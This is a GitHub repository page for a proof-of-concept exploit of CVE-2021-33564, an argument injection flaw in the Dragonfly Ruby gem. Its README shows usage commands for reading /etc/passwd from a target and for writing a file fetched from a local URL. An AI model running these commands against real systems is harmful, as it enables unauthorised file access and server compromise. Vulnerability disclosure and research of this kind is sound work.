Skip to content

mlr0p/CVE-2021-33564

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2021-33564 PoC

Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem).

Usage

Arbitrary File Read

python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd

Arbitrary File Write

python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>

For more information, please visit the blog.

About

Argument Injection in Dragonfly Ruby Gem

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages